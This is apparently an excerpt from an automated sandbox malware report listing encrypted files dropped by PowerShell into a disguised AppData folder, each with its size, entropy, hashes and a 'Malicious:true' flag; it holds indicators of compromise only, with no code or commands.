                                                                                                    SHA-512:AC40E8E78FB3D385ED15A747D1A39AD8FC5189A9B370E7DC378641786758C7375C2AE6E428415C017B35A2ACACA839B0C60E0BD1C479B672B51596E8E5AF3A97
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\krqIJEOnjTWS.rDWMREvyASFjXIa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:little endian ispell hash file (?), and 7937 string characters
                                                                                                    Category:dropped
                                                                                                    Size (bytes):178905
                                                                                                    Entropy (8bit):7.998948593194168
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Tt9ikY8LGsVkxKVgiYjO3sULX9DGHjTo6VJzRzxFQm0gVDrs1E:Tt4kdasVXVgiY4s2cgyFzxFh21E
                                                                                                    MD5:A5BC4A8021A8330AD10F7DD909E7D855
                                                                                                    SHA1:98011EA917D66ED87A2753CE13FD04A6A0339D66
                                                                                                    SHA-256:60EA28AFBB611B2AE0E0EDD2A7CD04EE4FA4901F97898334127E85E2698B1542
                                                                                                    SHA-512:A9AD0374A64970DE50DFA7AD4DE7D0BA810B242A1488B06054BFB2DA09937F3230C8E6DF23EE31FE61ED5EDB1C78A9138A5CED7F26DD2ACF791A959790128FF0
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCBidQIwcZav.zNnsXvMAfcB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177820
                                                                                                    Entropy (8bit):7.99900450167475
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1y4AGO4RExc2P7+oF1Yf9Clxge5HKdLemHBuUNH0Iqehw1nU3ifI96:pAGO4REx7z+oFSf98xZHVwEUF9K1nM0x
                                                                                                    MD5:24F826499D0171AE9826887B5382DDE2
                                                                                                    SHA1:B0BC48873B92DF7139DCA5FF80893DE37D3EB039
                                                                                                    SHA-256:0454BE56F9AA23A7A78E6E7F7E21F166288EF349621A33873B87523816D06481
                                                                                                    SHA-512:748445760757128B950D91403EC203604D618DAD1910F52D2D99D3AA30A78038AFB7845195942C24340CEB54558179B23AF35E0A53ECEF50F32B848B2C4DFA37
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCPVwzOuUaBZm.eXJWGlrmvw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93683
                                                                                                    Entropy (8bit):7.997881988651579
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:V6QxglkaxHg4DzCzKx4m9y6c683V2dXkcSNWcyBC0Kw5AL3PsaDweN:0PgwCt9678FaX/4WcyBCgAL3/N
                                                                                                    MD5:373E3E87BCFF8A1172B811C1E10F8A9F
                                                                                                    SHA1:56A7543017FB8687CF142C27EF35B6C3B6DDC47D
                                                                                                    SHA-256:55AD9FF574C07F76F87F7E8DFDB94594AD4829D3668EE769D0788DDEFFAB9911
                                                                                                    SHA-512:7F0F42A96F5E8B2BF0524B514E600A1FE2591E6F340A6AABF85AA8DB85E8D9A4268931D0CCACB22693C144A2E671BFF43AAED3E16BBE8898E8B331AEE04E85F9
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCzNubFOAJTw.SRuJjOGKVDmLo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117475
                                                                                                    Entropy (8bit):7.998425725779343
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:QFRxSH0tt9arVB4Ap1PCCxQCdgaKrEvpUYPn8OTLgCT9Aso026OXX0hMxZ6d4URW:WRsaTarVMCuCqaVvS2TD9Aso/dHkddKZ
                                                                                                    MD5:03DB265CC00CA015D392FE70222FC48E
                                                                                                    SHA1:366DC00DF20C0883E4CCEA8456D10BA3182D5392
                                                                                                    SHA-256:00584CC3AAF91AA21C824978526822ED286CC4DE9C39FF9D8E14E8534752B8B9
                                                                                                    SHA-512:A267B0DD7F9D535D9FF1033B165DB68A4A1E5B009F7D1971CA7BC5E4AC59E59E9B78C5D8326657751ADEDC8A919FB676D161FA785A6705EC8837B046FA572B1B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lIxrMbusnHJcBoC.xQYIbOmaVzGljUAtpi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116623
                                                                                                    Entropy (8bit):7.998554487182719
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:d7sjQnZM2egxtpk/ZNSkYn580boETHtDpscbDFiW:RsjQni2DFk/TSkYnLoMtFlbpiW
                                                                                                    MD5:D1CAD420EC2DE5F1E94F7951280BC92D
                                                                                                    SHA1:025BF8485DF4BC987AEF2D19483FEFE77D90D208
                                                                                                    SHA-256:6C1B4F18664D0E2605827F1C4BE98B5E8023112B2BC2B3CD44C72E2014814404
                                                                                                    SHA-512:E2550E8AF4589B0B478952EB0F307254CBCA2D926AD344DB4A8CF4CB5DDDCC244A998AF8D75B64D8B0290827CA64B95173E2982AED58F46C47C5AB5F7BFD505C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lZnrDvVxOWKwa.CtrIMSdDyULzsJFV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):191664
                                                                                                    Entropy (8bit):7.999059641625179
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:d7sjQnZM2egxtpk/ZNSkYn580boETHtDpscbDFitU56aF12mmM9t5SRbv1NSi:RsjQni2DFk/TSkYnLoMtFlbpiO5TQRbn
                                                                                                    MD5:33F6E6996CE575C01A89DE5A75980969
                                                                                                    SHA1:533A4752BC91FD32AEF03FA53860F213FC6FAC93
                                                                                                    SHA-256:820DBD73B9247271AFE7069673B87A5CB53E7C8630E04CF925FC2F534D431E99
                                                                                                    SHA-512:70C3BC6B459A6F69FBAE4505586AD06D1D99C53DFC9113E2758956394CCC102791CC7C3750DC62C97CA302C2BEC41800B19ED4F469670DDE0A1397959E2DF5CD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lsZtIjvPLeTFONEYoR.QlrbLyCigOvGY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164743
                                                                                                    Entropy (8bit):7.999127351438595
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\luqQJXdPpGHef.fxQuzBylFe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57161
                                                                                                    Entropy (8bit):7.9968369561145085
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mFzrGopuJQNOTdk.IgYKySZhpwTmWclqVeb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):192561
                                                                                                    Entropy (8bit):7.999066572046246
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mLHqylxgROeIY.saQFAtwbiS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55202
                                                                                                    Entropy (8bit):7.996491554007425
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mOypzjQubiL.DwTnpEFAXkBIs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109468
                                                                                                    Entropy (8bit):7.998173418043891
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mfVTGazKyhAXtCsEn.VSybpexCERAwcY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165781
                                                                                                    Entropy (8bit):7.998966110712019
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mrSfhYtocBCOGXniKlu.zITnyRuGslc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):115661
                                                                                                    Entropy (8bit):7.998539462777047
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nNsJXqaRkFQIVh.repMtLEGluna
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92428
                                                                                                    Entropy (8bit):7.998103718903747
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nVtfZzYLAsdWieo.SkZbYxzBrUimy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116737
                                                                                                    Entropy (8bit):7.99869527111815
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nYhyEmGcPIK.rBiKdcykOnulxbRQXf
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76490
                                                                                                    Entropy (8bit):7.997383285233256
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nZgWUTfIbV.NcIMegvYBwQATEHFZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75361
                                                                                                    Entropy (8bit):7.997249482680939
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nbdHxsrGkAhfXtMRwW.pxgjWrdGRQi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):127674
                                                                                                    Entropy (8bit):7.9987548033988025
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8sfeI5uTnIcku+KCNIiaCHCpKMu9OTk5zitoK9ll+gs+zDS0vr:XVEnAu+KCNmkMwOYzitDYg8sr
                                                                                                    MD5:1D591B05170F8FD9BE6C7BF95AE62CAC
                                                                                                    SHA1:AC30572B654B4B0EFA1EA3054F90790D585D131C
                                                                                                    SHA-256:94E586DD69FE76C018A35A595C91DCB456D7C55A71A99749413CF130D7BC8AE1
                                                                                                    SHA-512:C92009316E9B3E4CB64EFD302E4EE4D9A5DA0281300D9903FE5B4A7F23E68350204657DB54B970556B9273974DAD972A6701B1D488875D6A2D7C331648E0E35B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nrPdzlWUTZMvCxiFg.IVocudRDyhq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):197073
                                                                                                    Entropy (8bit):7.999213676015918
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:g74JVwpZs6iQ8QXfeGom7HXcTkYSW/NKF6krmhA/KdEyiqH:g7VfBZTKkf6Id/WH
                                                                                                    MD5:833D2AC7F0B5D66B2C063F96F120A1F0
                                                                                                    SHA1:5858530DD7A0910267A6BBC68EBD99725249C477
                                                                                                    SHA-256:EA2DD6DA829AFA79FA4FD3C1107341C03C9F0B3C8E8B04E9BB4800428E2D3973
                                                                                                    SHA-512:7DDB260E7A3AE247007825E610090466D8FF7817762C0512A7094BAF5FAF83550C50A4BEBFCF890AB2B6A90E6C4391E31E6DDBEB7E3719890ED6196472E9254D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oHOZepRMCYPilyhX.ifzlgDILyw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79149
                                                                                                    Entropy (8bit):7.997433985431224
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:v2Qs2gBdiUAfrswooCq3UrkcgRQhtnC/ft/ebm9Z8wYUUCL4Y9qBYH:v2D2wrAfYSCDJhMtGKwwYLCfgBYH
                                                                                                    MD5:0E7A28E23EAA8F62D124B1B074E20FF8
                                                                                                    SHA1:091DF03BDCD1C49B48AC6DCDF8D8E60F886012F5
                                                                                                    SHA-256:78C5F86562C34FEDC7B20AFD9B3B9C0CAD569FE47C3F84541915BC21CF8E7866
                                                                                                    SHA-512:6CDF58940E8C4E2AFF93B21764C095273CC84A219BF936C6EC03E94D017E6031B25E6AC973428765947791CDE61ADA6E1DA5448638A7867B40D419B346E7A4EE
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oIKiDVCakpHw.cDqyRkgfSdrsNABj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94505
                                                                                                    Entropy (8bit):7.997890884571381
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:bKZYnvdhyNzHIBLCJSyK7SusjO+L8+rYtQQNp/koHECJMTm+5lobQz8vBRVSh9PM:h6FHIBLqSFxsjO+Y+UDPHED5oQzGRV4u
                                                                                                    MD5:374731EF9FD31CE97359C79D5F1BBCD5
                                                                                                    SHA1:030DC378B2283C4804DE778B9723ECF7FEABBFE1
                                                                                                    SHA-256:156597AE86AE0DB28F1EE1401ACF4A2F7984D348B10C1093C1ACA7CEFF20CCC8
                                                                                                    SHA-512:DA31DC99A74FBACD82B61C9AEDA79330F67B5EDC58197042E2EF3BC7CABCF918252E78C81523C62A93287B684E49595806902C4C0E74259CE3090474B9AF36F9
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oQGwTmSRbnlOWZj.EjAidlJqhstwzBQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):172327
                                                                                                    Entropy (8bit):7.998950369574349
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZJHz/UH9qMmxRU7vq2l9o25nhQLoD/liIqSybXGXZhLx88:Z5zqbeR0q2l9o2phL/ljyb0x88
                                                                                                    MD5:8F8D6566323DCA0FDC81040C3BF24CE6
                                                                                                    SHA1:F1D485B3316C57942804FB191276423680312F98
                                                                                                    SHA-256:9B646D62A3E67D09A3E1484C9A25C44E9640467AC40735D87E7EE9960BD1A0CE
                                                                                                    SHA-512:EDAEE1C56E7801657A7F50E8FEA2AA44E29A7D18C14E72062DB9F2ECDEC977A29B3E2D47A1BDBA542F70CE37491D452D585989095F79BB25F7A833912ABC65B3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oVvsglHIGE.ctNTahrQzfFRP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:little endian ispell hash file (?), and 7937 string characters
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61630
                                                                                                    Entropy (8bit):7.9968412962934385
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:i21Q6V35fApck98fmk6t8LGsbZkxKvdgU3ToljO3S:Tt9ikY8LGsVkxKVgiYjO3S
                                                                                                    MD5:4BDB45D282387882A0C3B7A0F757E1C1
                                                                                                    SHA1:F79DA8C12CADBA11F567A344383924D7164BADF3
                                                                                                    SHA-256:BB1223A2E9687617E04144CC6D5122AEF23214ECD3D5F0233FFF4AEBFB9B753E
                                                                                                    SHA-512:C45312510C41B45A6910EF5D3764E7F76EDD6DB0F14116FCF963FE7F89875045577656C44570CCD94C9CC07E3242B583B7A2332F41E03368A68485FABE3E1821
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ojPnURfFIOLWAsphq.OPbdGKtvhCQlzA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174593
                                                                                                    Entropy (8bit):7.998875958508988
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6s33qZlkI7rKwJ/ge9mpW4X9+wjdITJbdXflbHsIai3ng4/GFSozp57Vi7pOvq:oHIW4X9lAtdXflHdnXg4/GFXzD7c7pOi
                                                                                                    MD5:9BD5373D030711D66AB4446B45F655A8
                                                                                                    SHA1:529E6A4F4EAF226630EA0A0DB7400C791B11929D
                                                                                                    SHA-256:5A478ABCE783B5718F58A65078FA53ACFA9D2496F633F8C08A3B1AB3544AE66E
                                                                                                    SHA-512:FDDD58EEC032AA113226A45C3038028C6F82EB1A7E5A3FA21C801F50C7957DF1BEF46CE610E3EC6E5950839AFA26D884EC47F68C9E23347C9BB872EEE196F331
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\olyGLuEsqpXQOTKD.rRPQajxdwK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85501
                                                                                                    Entropy (8bit):7.997533291643169
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:8WNcaSzj62pBlvvHw9D9kR3LkgFsnawGl4YaiU04yg7JQlXaegvGg5d:ntMddHwC39sOy5k4ygOpa/P5d
                                                                                                    MD5:7ABE9C0A430BF4A86EA4EAD41952401B
                                                                                                    SHA1:D6CBF0D2C6D6620CCDEEA214EEE7FCBC2852F088
                                                                                                    SHA-256:9DCDA4F8769D5E523FA922642A696CDED41C31C6DBEE26235B30DA345214F563
                                                                                                    SHA-512:A4C6C4FDB6954B6A21A03FBA03BE14EFEA012A7B169BB4DF2A56B2BBDB9BA3D8A872E1754300918709F6B50BEEEFDBF020444544336C58E025C3E3745C324ED5
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oqPfYvAlZLiCatc.UlXcqgCxzwSZjNJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):166576
                                                                                                    Entropy (8bit):7.998844042913613
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0S+7PTlFDgsFAYoFpqeZ2ppyABOaH7gVEVtY9cvrWtZFk3MQBNqTd/pQ+1AhodK9:L+tFDJFAYskRqqQc3kZFk3M0qT902SL
                                                                                                    MD5:53A4B58695945BA88B1FCECC90157A32
                                                                                                    SHA1:A090BF2B23A999984CDF4A89E894880145282E6D
                                                                                                    SHA-256:888467106039353B3D8ABA149B145805F9F8EDCC9BA61B994E8F1E35F67E4D03
                                                                                                    SHA-512:BA88F8F1516E720D85E4EFC07832F4572A1F2488598DED5DB30B4605CDDEC77B19F4D5B6BCF99C32914635FDE4F884001049512279E19070DF46A3784500CF68
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oxDHGkPWXzBOvitS.jEBzVfvaCWy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87542
                                                                                                    Entropy (8bit):7.997999708820864
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:d7sssp1qnNvkSU28r6puJBcW4Ztpk/vRNSAVYBJ75Ot0VcqBWETQa1K:d7sjQnZM2egxtpk/ZNSkYn580boETHK
                                                                                                    MD5:FD43A2342F51AA308CFD7E4A6226E79E
                                                                                                    SHA1:2AE74F268947AB71B2F175175A42009F1B21464E
                                                                                                    SHA-256:5CD6F8DB4947F4C41AED22D9FA10F2A995786200AA6D5283C8C6BC9282361299
                                                                                                    SHA-512:AB4A3B2BC84132B9403CC0704E49FAE7695534D8EA500F1BD07F12F1DF8181B9B257A0C0BAA377601BBA1595597C18004924BB6B6D2809664522A0DCD1C1CBD7
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pCcSxloMwaiItLhdAyg.JPuAMbnZyYIWz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95693
                                                                                                    Entropy (8bit):7.99804695336404
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:tlwsEoHlnPms+1RbWN5Nfgdzv9gzD7s19INm8Jv9vqld/yVgAlEs/T/6W+s9Yqu/:4sLPIM56zlgzPs1im8DqH/mgvs/T/6tx
                                                                                                    MD5:C98F542A268800B807B257CBBB48F31F
                                                                                                    SHA1:ADA8C77BF025CA29708F6A8430DB546B0299A7FB
                                                                                                    SHA-256:030A016AE190FB63789F901C8C8DA2FFC9102CDC66C111F212D424BC384C7EB6
                                                                                                    SHA-512:B212F04E6A86EBF2C1D5817B73EFA5C339E65AA62971CE7F28A759F971C8570DB4947A3E8D0348550E6E123D7906FD8BEC2EA0298DCED1B32B1FAFC44D3BDDEB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pHrCdQLUzWDGOEcNsh.AiCapRLtkEcjQPrFHw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57303
                                                                                                    Entropy (8bit):7.997118109138539
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:85fIQQ4rFs+UFW4EXbIDam7tVbK0zwyQQ:YfIR48FWRYaot9hcyQQ
                                                                                                    MD5:4449501147C04D47398BAFFDBD519FB6
                                                                                                    SHA1:EAD04E94252E99FC0BA5355D27DEEFA5037F871B
                                                                                                    SHA-256:7BE1C406D2EA0BC9CE742B3902E186F7C095460CE4F23149B235E95B30560D67
                                                                                                    SHA-512:26CA008D0D44FCF241D369851EE79AEE708A1BCCDBD292A804D8477976A8CC1B83734D3718E24C53D67E860E449244C07F57F4909E119DBBDB09B1C338FC1B68
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIHzwhWPoCtJyQMcdYf.QXsBZLrWyiYldegSCU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126653
                                                                                                    Entropy (8bit):7.998428656000752
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:n5i3WXhSlYEW0uKxLmc7bFK1alIWH9vwvVK4wmkgBb8dI:nmWX07R5/FhJHtq2BgBbf
                                                                                                    MD5:3449DD5972BCE42BE3B5D3A860270783
                                                                                                    SHA1:E19F14A0D4C809DA226B4D28C9B4D8D132B343E0
                                                                                                    SHA-256:77A9E59C4364624F0498C3FDB65F3FA7B479F7D5FE5A9CF10FA8390FE6A1EBC0
                                                                                                    SHA-512:8A903AFA8E1364F0DD4B1F07F85B48B02EE28429F0FA4E14D924B4EC07BA7D7C08694FD4E98FA9E345D973D2416382E978CE547494F0B5F771442D65FF8A4395
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIyjDcEgAxKfHBMwWn.ibgdoSxBvJXpsO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):159333
                                                                                                    Entropy (8bit):7.99889357619552
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:avi7y8ktPcATF2X21qYPHoi32GEZuiyOxtZAXl6iSz0PIc:a2kcATs24YtjIxtZAX3Sz0PIc
                                                                                                    MD5:9BF6106EC9541D5D4BD7A4384EEE9D92
                                                                                                    SHA1:76C9D59F233CF238D479F6A92696CC40C8F81D75
                                                                                                    SHA-256:A08BC5B8BAAFB0D474051A54FF2CB0350C229A09271225E1F91BBA0FBC23C733
                                                                                                    SHA-512:89171E1F710CEFFFB0E150D663000292E4AA7DB49F5D308EF0C8B8AF740139D66E927632D19756B24806716FF3F611423F96EB9C3D6663A9ABB428CA00375B15
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pUOKADnHErWscxtiIF.xgGiJHEyhOkR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196286
                                                                                                    Entropy (8bit):7.999073722353039
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fX2jbmJjRxPCiT9Lb5INx1XOoOQOufqFv4lanDPmSFTlnuWpVXcyAPy3GGL57bCH:fX8mJ36iTcxQoPOMq4WdBlnlHNMfGLZU
                                                                                                    MD5:4EBFEC46FF942C963721EB7765FCA6FA
                                                                                                    SHA1:7EB7269B64C69A28E5B102B8262309118E8F2654
                                                                                                    SHA-256:874A62945638F048B3226D7FC8E223DC14D7E9D974385A4739076386DAD2AEB3
                                                                                                    SHA-512:809140900E9A30A4AF6F598A1E3ADD0743B270704A31C155439D381E200D53A5CB5C5F54833A897076EC7F9625648F9415501ED0851AA7DF79A3FF4AB722D377
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pkfyjRWtwVO.vtdVMXcwBxhJyTaq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):145804
                                                                                                    Entropy (8bit):7.998927737168523
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:IgSly5RDvMMGv0hfr341cAh/ZS5pfbLng2Uwjnuy9Ixiaszs6:BSCo98hMm605pPnJunKzs6
                                                                                                    MD5:3316D8CA0E7F1A18A55F9DF11D9E8258
                                                                                                    SHA1:315E5E1928EDC7852A2253C427B215C542DBCAD1
                                                                                                    SHA-256:10EC3E6AA2C0B536CB4E30D09E9D65AF33D6DFC4755AA84A9E68E87D1CE6F96E
                                                                                                    SHA-512:E6D01BADDD4702B622BF3CEEA9394192EAE2C06ABD987F7619A3122B60A4C59017446CFDA43F8E0F88C66E7D8C6E5E5B8BF08374ADCF2116A4083AF183948563
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pqNrZDvUBGJei.TQopRzkgmVJhZD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109042
                                                                                                    Entropy (8bit):7.998066262095429
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YZvSMGW7+q8eStXY3nEplekfmKi6X6gCB6xSX:Ycup54QglekfmUKjQ8
                                                                                                    MD5:F395EDE54D746103EB07F0D7B2AAC7C7
                                                                                                    SHA1:CB199FEE1D7F5918A7B7C34BF8B50857826370B5
                                                                                                    SHA-256:D4F897CCD3958FE28F5589F715877D38C5837C58D9E4AD84B79A9C03B01E8820
                                                                                                    SHA-512:FF93D111AD8FCA86139960C0F2CCAACB2469BCA42DE3D68DD9387E288E970B1A8EFDA3B2BDC5820CE9AEB2579BBE36561DB8EEE494A5A77D6AEF98A0FAA133EA
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pvqeMSzPZs.tKjEShlWDUXs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95080
                                                                                                    Entropy (8bit):7.998041757996783
                                                                                                    Encrypted:true
